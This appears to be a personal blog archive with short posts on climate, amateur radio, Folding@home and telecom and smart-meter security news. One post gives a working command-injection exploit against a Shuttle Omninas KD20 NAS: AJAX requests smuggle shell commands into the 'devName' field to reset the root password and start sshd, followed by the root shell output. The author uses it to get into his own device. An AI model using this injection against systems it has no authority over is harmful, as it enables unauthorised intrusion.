Categories
geoengineering

Environmentalist Bill McKibben on national security implications of climate change

https://www.cbsnews.com/news/environmentalist-bill-mckibben-on-national-security-implications-of-climate-change/

In this episode of Intelligence Matters, host Michael Morell interviews author and environmentalist Bill McKibben about the national security implications of climate change, including how current trends, if unchecked, could lead to future catastrophes. McKibben explains why taking certain actions immediately and for the next ten years is crucial in order to forestall mass migrations, crop shortages and deadly droughts. He shares his views on the troubling parallels between climate change and certain accelerating technologies like genetic modification. 

Categories
shrug

“because it sounds right”

Once in a while I think about how people learn. Being an explorer I enjoy continual learning through exploration. It’s one of the reasons I really enjoy R&D projects. But friends and I have talked over the years about why some people don’t seem as analytical, or perhaps – creative – in their thinking. I know for myself my mind will sometimes light up with a bunch of different views of what I’m processing, but I’ve never really understood “the why” of this.

As I’ve been getting older (hey, I’m 42 this year!), I’ve also been remembering experiences that were otherwise shelved into some deep filing cabinets. Today I remembered two:

  1. Finding the Code Red Worm
  2. How I used to annoy my english teachers

In the case of English class, “why” was usually “because it sounds right”. Never a good answer.

Code red was the same. “How did you know it was a worm?”. “Because it looked like one”.

I guess sometimes you just know.

Or don’t.

¯\_(ツ)_/¯

Categories
amateur radio

DMR

My first taste of Amateur Radio was in the early 90s – I have a ‘replacement’ operators certificate dated 1991, and maybe even one of my original yellow licenses from the Department of Communications kicking around in a box somewhere.

It’s been a while since I’ve messed around with amateur radio. I use APRS on and off for various reasons, but voice nets weren’t really of interest, and data networking was always pretty interesting to me. In the 90s I played around with AX.25 and even went to Vancouver Area Packet Organization meetings but as AX.25/IP gradually died out I found other interesting use cases in the ISM bands to play with.

QRP and digital modes have been on my radar for a while. One of these days I’ll get more into HF work, but lately I’ve been eyeballing the need for a new HT – and location tracking is pretty much mandatory. I’m not interested in spending a lot on an HT either and as a result, I’m eagerly awaiting my BTECH DMR-6×2 to mess with.

The thing does APRS over analog, and SMS over DMR intrigues me. Actually, 9600 bps over 2×6.5 Khz channels intrigues me – but that’s a post for another day.

In the mean time.. notes to self:

Categories
cv19

[email protected] Now More Powerful Than World’s Top 7 Supercomputers, Combined

Propelled by average enthusiasts in their shared quest to defeat COVID-19, the [email protected] network is now pushing out 470 PetaFLOPS of raw compute power. To put that in perspective, that’s twice as fast as Summit, the world’s fastest supercomputer, making the network faster than any known supercomputer. It’s also faster than the top seven supercomputers in the world, combined. 

https://www.tomshardware.com/uk/news/folding-at-home-worlds-top-supercomputers-coronavirus-covid-19

Categories
telecom

Tobias Engel: SS7: Locate. Track. Manipulate.

Categories
hardware

Getting root (and SSHD on boot) with the Shuttle Omninas KD20

I recently picked up a Shuttle Omninas KD20 on sale from NCIX.    It runs Linux, but sshd is disabled by default.  Thankfully it wasn’t too difficult to break in to.

:)

The Storage -> Disk Manager page has an info button that calls smartctl -a.  It doesn’t check parameters passed by the page 

With the Disk Manager page loaded, open your Web Developer Console and run the following javascript commands:

(pastebin text version; thanks to scotty86 for the paste)

$.ajax({

type:”POST”,

url: ‘http://192.168.1.93/action/healthy_action.php’,

cache: false,

//data: “devName=sda”+$devName,

data: “devName=/dev/sd; (echo \”foobar\nfoobar\n\” | sudo passwd root) “,

success:function(data){

console.log(data)

}

});

# Changing the root password

$.ajax({

type:”POST”,

url: ‘http://192.168.1.93/action/healthy_action.php’,

cache: false,

//data: “devName=sda”+$devName,

data: “devName=/dev/sd; sudo /etc/rc.d/sshd.sh start”,

success:function(data){

console.log(data)

}

});

# start sshd

With those simple little ajaxy functions I was able to access the device via ssh

login as: root
[email protected]′s password:
BusyBox v1.10.3 (2013-11-06 11:05:30 CST) built-in shell (ash)
Enter ‘help’ for a list of built-in commands.

OMNINAS-XYZZY> df
Filesystem 1k-blocks Used Available Use% Mounted on
/dev/ram0 15863 2134 13729 13% /initrd
/dev/md0 201556 372 190948 0% /system
/dev/md1 1463634048 27294636 1436339412 2% /share/atonnas
OMNINAS-XYZZY> cd /proc/
OMNINAS-XYZZY> cat cpuinfo
Processor : ARMv6-compatible processor rev 5 (v6l)
processor : 0
BogoMIPS : 299.00

processor : 1
BogoMIPS : 299.82

Features : swp half thumb fastmult edsp java
CPU implementer : 0×41
CPU architecture: 7
CPU variant : 0×0
CPU part : 0xb02
CPU revision : 5

Hardware : Oxsemi NAS
Revision : 0000
Serial : 0000000000000000
OMNINAS-XYZZY>

Yay!

It would be nice if Shuttle just enabled ssh by default though.  Pretty please?

Categories
security

Smart meter SSL screw-up reveals a bit to much information

The researchers said German firm Discovergy apparently allowed information gathered by its smart meters to travel over an insecure link to its servers. The information – which could be intercepted – apparently could be interpreted to reveal not only whether or not users happened to be at home and consuming electricity at the time but even what film they were watching, based on the fingerprint of power usage.

http://www.theregister.co.uk/2012/01/09/smart_meter_privacy_oops/

Categories
security

What if They Declared an Emergency and No One Came?

The Attawapiskat First Nation is in such a desire state that it has declared a state of emergency – but no level of Government or aid agency has come to their aid.  The local grade school shut down 12 years ago thanks to toxic contamination – 13 year old’s have had to step up to draw attention all the way from the United Nations.  Yet right next door is the De Beers Vector mine – the richest Diamond Mine in the Western World

http://www.huffingtonpost.ca/charlie-angus/attawapiskat-emergency_b_1104370.html#undefined

Categories
digital-divide

Low Cost/Low-Power/DIY Cellular data network

From http://shareable.net/blog/a-low-cost-low-power-diy-cellular-data-network

Shareable recently covered a group of residents of Jalalabad, Afghanistan who built their own open-source wireless network from junk and everyday household items. For the less-industrious yet DIY-inclined, the Village Base Station (pdf) is a low-power, easy to deploy tool developed by Berkeley professor Kurtis Heimerl to create a GSM cellular data network in areas with limited power and network resources. MobileActive recently got their hands on a prototype and tested it in a large American city, and the results were promising. In a post about the experiment, they note the benefits of the Village Base Station:

…?exible off-the grid deployment due to low power requirements that enable local generation via solar or wind; explicit support for local services within the village that can be autonomous relative to a national carrier; novel power/coverage trade-offs based on intermittency that can provide bursts of wider coverage; and a portfolio of data and voice services (not just GSM).

Categories
security

4G and CDMA, GPRS reportedly hacked

Extremetech reports that a MITM attack was conducted against all 4G and CDMA transmissions in and around the DEFCON venue in Las Vegas.  Apparently the MITM attack allowed attackers to obtain full access to some Android and PC devices, and was able to monitor data and telephony sessions.

The Register is also reporting that Security Research Labs has developed a way to monitor GPRS conversations by exploiting weaknesses in the protocol.  Demonstration software is expected to be released at CCC 2011. (In 2009 SRL’s Chief Scientist also coordinated release of a rainbow table to assist in cracking GSM, and in 2010 other cryptographers where able to defeat 3G encryption).

Fun times!